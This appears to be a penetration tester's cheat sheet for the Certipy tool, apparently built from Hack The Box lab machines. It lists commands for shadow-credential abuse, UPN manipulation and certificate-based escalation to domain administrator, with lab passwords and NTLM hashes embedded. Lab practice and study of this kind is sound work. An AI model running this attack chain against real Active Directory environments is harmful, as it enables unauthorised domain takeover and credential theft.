Certipy

Description

Certipy (certipy-ad) is used for Active Directory Certificate Services (AD CS) attacks. It can find vulnerable certificate templates, request certificates, and authenticate using certificates to escalate privileges.

Usage 1: Shadow Credentials Attack

Abuse shadow credentials to get NTLM hash.

Command:

certipy-ad shadow auto -username p.agila@fluffy.htb -password 'prometheusx-303' -account ca_svc

Command (With time sync using faketime):

faketime "2025-11-04 09:34:26" certipy-ad shadow auto -username p.agila@fluffy.htb -password 'prometheusx-303' -account ca_svc

Usage 2: Find Vulnerable Certificate Templates

Command:

certipy-ad find -username ca_svc -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -vulnerable

Command (With stdout output):

certipy-ad find -dc-ip 10.10.11.41 -vulnerable -u ca_operator -hashes b4b86f45c6018f1b664f70805f45d8f2 -stdout

Usage 3: Read Account Information

Command:

certipy-ad account -u p.agila -p prometheusx-303 -dc-ip 10.10.11.69 -user ca_svc read

Usage 4: Update UPN for Certificate Abuse

Command:

certipy-ad account -u p.agila -p prometheusx-303 -dc-ip 10.10.11.69 -user ca_svc -upn administrator update

Usage 5: Request Certificate from Vulnerable Template

Command:

certipy-ad req -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

Usage 6: Authenticate with PFX Certificate

Command:

certipy-ad auth -dc-ip 10.10.11.69 -pfx administrator.pfx -username administrator -domain fluffy.htb

Command (With faketime):

faketime "2025-11-04 10:26:43" certipy-ad auth -dc-ip 10.10.11.69 -pfx administrator.pfx -username administrator -domain fluffy.htb

Usage 7: Request Certificate for ESC Attack

Command:

certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication